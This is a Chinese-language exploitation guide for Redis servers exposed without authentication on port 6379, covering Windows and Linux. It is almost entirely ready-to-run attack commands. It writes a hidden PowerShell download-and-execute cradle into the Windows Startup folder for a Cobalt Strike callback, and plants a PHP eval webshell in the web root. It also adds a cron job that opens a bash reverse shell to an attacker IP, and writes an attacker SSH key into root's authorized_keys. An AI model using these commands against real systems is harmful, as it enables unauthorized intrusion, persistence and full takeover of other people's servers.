windows利用方法
通过端口扫描扫描到靶机开放6379
启动项
通过写入到windows启动项进行开机自启动提权 通过未授权访问进行连接,输入info查看是否连接成功 成功以后搞一个cs监听 生成一个powershell钓鱼命令 powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:80/a’))” 通过redis未授权访问漏洞设置写入路径 config set dir “C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/” 设置写入文件 config set dbfilename 1.bat 这里看了一下网上,发现复制的都是错的,后来发现"闭合问题使用\注释之后才可正常写入能上线的powershell set x “\r\n\r\npowershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx/a’))”\r\n\r\n” save 重启之后直接上线
webshell写入
此处linux和windows一样就不在linux复现了 写入webshell 设置写入web路径 config set dir c:/phpstudy/www 设置写入文件 config set dbfilename shell.php 写入内容 set x “<php @eval($_POST[‘swzaq’]) ?>” save 连接webshell
linux利用方法
计划任务
获取info信息 监听端口444 执行如下命令大概一分钟内反弹shell set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.105/444 0>&1\n\n” config set dir /var/spool/cron config set dbfilename root save
ssh公私钥
使用客户端生成私钥 ssh-keygen -t rsa 将生成的公钥保存成1.txt (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > 1.txt
将保存的公钥1.txt写入redis cat 1.txt | redis-cli -h 10.10.10.135 -x set crack 更改redis备份文件路径,设置上传文件名为authorized_keys config set dir /root/.ssh CONFIG SET dbfilename authorized_keys save保存之后直接ssh -i id_rsa root@192.168.80.130登录
|